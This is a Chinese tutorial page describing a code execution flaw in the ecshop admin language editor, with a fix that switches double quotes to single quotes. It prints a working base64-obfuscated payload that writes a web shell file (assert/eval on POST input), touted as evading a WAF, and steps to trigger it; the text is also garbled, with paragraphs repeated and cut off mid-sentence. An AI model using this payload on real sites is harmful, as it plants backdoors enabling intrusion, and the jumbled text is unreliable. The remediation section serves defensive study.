您现在的位置是:首页 > 教程 > ecshop商城教程ecshop商城教程
ecshop后台语言项执行漏洞介绍
凡旋2025-01-10 13:41:35ecshop商城教程已有人查阅
导读该漏洞需要能登录ecshop后台权限,简单修改下语言项目,即可在网站植入木马后门。
1.登陆到ecshop台后,选择模板管理,语言项编辑,搜索用户信息 为什么要搜索用户
该漏洞需要能登录
该漏洞需要能登录ecshop后台权限,简单修改下语言项目,即可在网站植入木马后门。
1.登陆到ecshop台后,选择模板管理,语言项编辑,搜索用户信息 为什么要搜索用户
该漏洞需要能登录ecshop后台权限,简单修改下语言项目,即可在网站植入木马后门。
1.登陆到ecshop台后,选择模板管理,语言项编辑,搜索“用户信息”
为什么要搜索“用户信息”,还可以搜索其它的吗?
答案是搜索languages\zh_cn\user.php文件里任何一个变量都可以
2.添加如下后门,将用户信息改为
用户信息
或
漏洞产生原因 在admin\edit_languages.php文件中第120行,修改变量内容,注意是用的双引号。
for ($i = 0; $i count($_POST[item_id]); $i++) { /* 语言项内容如果为空,不修漏洞产生原因在admin\edit_languages.php文件中第120行,修改变量内容,注意是用的双引号。
至于为什么可以执行?原理如下:
下面这三句话都可以执行,与其说代码执行,不如说参数执行。
了解了漏洞原理后,修复就是一件比较简单的事情,只需将双引号改为单引号
修改\admin\edit_languages.php
再次修改“用户信息”内容为之前修改的内容。打开\languages\zh_cn\user.php可以看到变量已经变为了单引号
再次访问ECShop_V2.7.3_UTF8_release0411/user.php已经不能生成JoyChou.php,代码没能得到执行。
1.登陆到ecshop台后,选择模板管理,语言项编辑,搜索用户信息 为什么要搜索用户
该漏洞需要能登录ecshop后台权限,简单修改下语言项目,即可在网站植入木马后门。
1.登陆到ecshop台后,选择模板管理,语言项编辑,搜索“用户信息”
为什么要搜索“用户信息”,还可以搜索其它的吗?
答案是搜索languages\zh_cn\user.php文件里任何一个变量都可以
2.添加如下后门,将用户信息改为
用户信息
${${fputs(fopen(base64_decode(Sm95Q2hvdS5waHA),w),base64_decode(PD9waHAKYXNzZXJ0KAokX1BPU1RbeF0KKTsKPz4))}}
即生成一个JoyChou.php文件,内容为(可以过安全狗的一句话哦):
<?php
assert(
$_POST[x]
);
?>
3.访问user.php即可产生shell(不用注册登录账户)或
漏洞产生原因 在admin\edit_languages.php文件中第120行,修改变量内容,注意是用的双引号。
for ($i = 0; $i count($_POST[item_id]); $i++) { /* 语言项内容如果为空,不修漏洞产生原因在admin\edit_languages.php文件中第120行,修改变量内容,注意是用的双引号。
for ($i = 0; $i < count($_POST['item_id']); $i++)
{
/* 语言项内容如果为空,不修改 */
if (trim($_POST['item_content'][$i]) == '')
{
unset($src_items[$i]);
}
else
{
$_POST['item_content'][$i] = str_replace('\\\\n', '\\n', $_POST['item_content'][$i]);
/* $_POST['item_content'][$i]是修改后增加的内容,即增加的"用户信息${${fputs(fopen"等内容$dst_items[$i] 是 $_LANG['label_profile'] = "用户信息${${fputs(fopen";
*/
$dst_items[$i] = $_POST['item_id'][$i] .' = '. '"' .$_POST['item_content'][$i]. '";';
}
}
修改完后文件\languages\zh_cn\user.php变量为:注意是双引号哦
$_LANG['label_profile'] = "用户信息${${fputs(fopen(base64_decode(Sm95Q2hvdS5waHA),w),base64_decode(PD9waHAKYXNzZXJ0KAokX1BPU1RbeF0KKTsKPz4))}}";
由于是双引号,所以只要在任意的php文件中引用这个变量,代码就会成功执行。至于为什么可以执行?原理如下:
下面这三句话都可以执行,与其说代码执行,不如说参数执行。
<?php
$a = "${ phpinfo()}"; // 有一个空格
$b = "{${phpinfo()}}"; // 多一对{},但是没有空格
$c = "{${fputs(fopen("JoyChou.php", "w+"), "<?php eval(\$_POST[1]);?>")}}";
$d = "asdf{${phpinfo()}}"; // {字符前可以随意加字符串
?>
而这个文件包含\languages\zh_cn\user.php 这个文件,所以也可以代码执行。
/* 载入语言文件 */
require_once(ROOT_PATH . 'languages/' .$_CFG['lang']. '/user.php');
5. 漏洞修复了解了漏洞原理后,修复就是一件比较简单的事情,只需将双引号改为单引号
修改\admin\edit_languages.php
// 修复前
$dst_items[$i] = $_POST['item_id'][$i] .' = '. '"' .$_POST['item_content'][$i]. '";';
// 修复后,由于想在单引号之间出现单引号,必须使用转义。
$dst_items[$i] = $_POST['item_id'][$i] .' = '. '\'' .$_POST['item_content'][$i]. '\';';
修复后,测试一下,是否还有漏洞。再次修改“用户信息”内容为之前修改的内容。打开\languages\zh_cn\user.php可以看到变量已经变为了单引号
再次访问ECShop_V2.7.3_UTF8_release0411/user.php已经不能生成JoyChou.php,代码没能得到执行。
本文标签:
很赞哦! ()
相关文章
随机图文
-
ecshop会员注册自动发送邮件欢迎信息修改方法
步: 数据库->ecs_mail_templates邮件模板表中插入一条注册发送邮件的记录。INSERT INTO ecs_mail_templates -
ecshop商品属性排序怎么按最新添加商品属性排序
情况一:添加新产品时,让属 按照添加的顺序(属 id)排列修改/inclues/lib_goods.php情况二:在 商品时属 排序跟原商品相反到处理修改/inclues/lib_goods.php -
ecshop伪静态设置方法详细教程
ecshop静态设置有两种:服务器或虚拟主机要支持伪静态;1、linx系统,在后台设置即可,按照提示修改文件。htaccess.txt 修改为:.htaccess2、WIN的伪静态比较麻烦:下面这个就是常见 -
ecshop促销活动每人限购1件的实现方法
控制ECSHOP的购买数量,在很多时候是必须的,而且当你有特别的需求的时候,控制数量显得格外重要。需要在goods表中增加个字段"gc"控制购买数量。
留言与评论 (共有 条评论) |